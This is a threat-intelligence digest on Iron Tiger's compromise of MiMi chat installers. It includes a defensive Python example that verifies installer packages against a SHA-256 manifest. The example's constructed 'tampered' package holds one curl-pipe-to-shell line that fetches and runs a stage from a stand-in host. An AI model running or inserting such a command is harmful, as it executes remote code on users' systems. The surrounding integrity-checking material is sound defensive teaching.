At a glance.
- Iron Tiger's supply chain campaign.
- An update on RedAlpha.
- Cl0p gang hits English water utility.
- Microsoft identifies and disrupts Russian cyberespionage activity.
- Vulnerabilities in Zimbra undergoing widespread exploitation.
- DDoS attack against Energoatom's public website.
- New Lazarus Group activity reported.
- Iran suspected of cyber operations against four Israeli sectors.
- Cyber war clauses coming to cyber insurance policies.
- BlackByte is back, and calling itself BlackByte 2.0.
- Cozy Bear update.
- Criminal gang targets the travel and hospitality sectors.
Iron Tiger's supply chain campaign.
Trend Micro reported last Friday that Iron Tiger, a Chinese state-sponsored threat actor (also tracked as APT27, Emissary Panda, Bronze Union, and LuckyMouse), has compromised the installers of the MiMi chat application in order to attack macOS systems. According to the researchers, this is the first time the group has been observed targeting that platform.
"We noticed that a chat application named MiMi retrieved the rshell executable, an app we came across recently while investigating threat actor Earth Berberoka. We noticed Iron Tiger controlling the servers hosting the app installers of MiMi, suggesting a supply chain attack. Further investigation showed that MiMi chat installers have been compromised to download and install HyperBro samples for the Windows platform and rshell samples for the Mac OS platform. While this was not the first time the technique was used, this latest development shows Iron Tiger’s interest in compromising victims using the three major platforms: Windows, Linux, and macOS."
MiMi ("Secret") is built for Chinese-speaking users, who make up the bulk of its user base. Trend Micro found in the course of its investigation that "in this instance Iron Tiger compromised the server hosting the legitimate installers for this chat application for a supply chain attack." The victims identified in the campaign were in Taiwan and the Philippines.
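The practical lesson of a compromised installer host is that the download server cannot be the only thing vouching for the installer. The following is an added example (not code from Trend Micro, MiMi, or this report) of the integrity check a defender can run against a downloaded package: every file in the package is hashed and compared, in constant time, against a manifest of expected SHA-256 digests obtained out of band. The file names, the manifest, and the "clean" and "tampered" package contents are constructed for the demonstration and are not taken from the actual MiMi installers.

```python
import hashlib
import hmac
from typing import Dict, List


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 digest of a byte string."""
    return hashlib.sha256(data).hexdigest()


def build_manifest(files: Dict[str, bytes]) -> Dict[str, str]:
    """Produce the manifest a vendor would publish out of band:
    relative path -> expected SHA-256 hex digest."""
    return {path: sha256_hex(content) for path, content in files.items()}


def verify_package(files: Dict[str, bytes], manifest: Dict[str, str]) -> List[str]:
    """Compare a downloaded package against a trusted manifest.

    Returns a list of findings; an empty list means the package matches.
    Three classes of tampering are reported:
      - a file whose digest differs from the manifest (modified content),
      - a file present in the package but absent from the manifest (dropped-in payload),
      - a manifest entry missing from the package (removed component).
    hmac.compare_digest is used so the comparison does not leak which
    byte of the digest differed.
    """
    findings: List[str] = []
    for path, expected in manifest.items():
        if path not in files:
            findings.append(f"missing: {path}")
            continue
        actual = sha256_hex(files[path])
        if not hmac.compare_digest(actual, expected):
            findings.append(f"modified: {path}")
    for path in files:
        if path not in manifest:
            findings.append(f"unexpected: {path}")
    return findings


# Constructed sample package: a hypothetical Electron-style chat client.
# Neither the file names nor the contents come from the real MiMi installer.
CLEAN_PACKAGE: Dict[str, bytes] = {
    "app/main.js": b"const { app } = require('electron'); app.whenReady().then(start);\n",
    "app/package.json": b'{"name": "chat-client", "main": "main.js"}\n',
    "bin/chat-client": b"\x7fELF-placeholder-binary\n",
}

# The manifest a vendor would publish separately (signed web page, release
# notes, package repository metadata); here it is derived from the clean copy.
TRUSTED_MANIFEST: Dict[str, str] = build_manifest(CLEAN_PACKAGE)

# Constructed tampered package: main.js gained a download-and-execute stage
# and a second-stage binary was added; the rest is untouched.
TAMPERED_PACKAGE: Dict[str, bytes] = dict(CLEAN_PACKAGE)
TAMPERED_PACKAGE["app/main.js"] = (
    CLEAN_PACKAGE["app/main.js"]
    + b"require('child_process').exec('curl http://example.invalid/stage2 | sh');\n"
)
TAMPERED_PACKAGE["app/stage2.bin"] = b"\x7fELF-placeholder-payload\n"


def check_clean() -> List[str]:
    """Findings for the untouched package (expected: none)."""
    return verify_package(CLEAN_PACKAGE, TRUSTED_MANIFEST)


def check_tampered() -> List[str]:
    """Findings for the trojanized package."""
    return verify_package(TAMPERED_PACKAGE, TRUSTED_MANIFEST)


if __name__ == "__main__":
    print("clean package   :", check_clean() or "OK")
    print("tampered package:", check_tampered())
```

The manifest only helps if it is fetched from somewhere the attacker who controls the installer host cannot also edit, which is why vendors publish digests on a separately hosted page or, better, sign the release so the signature rather than the hosting server is the root of trust. A mismatch should block installation rather than merely log a warning.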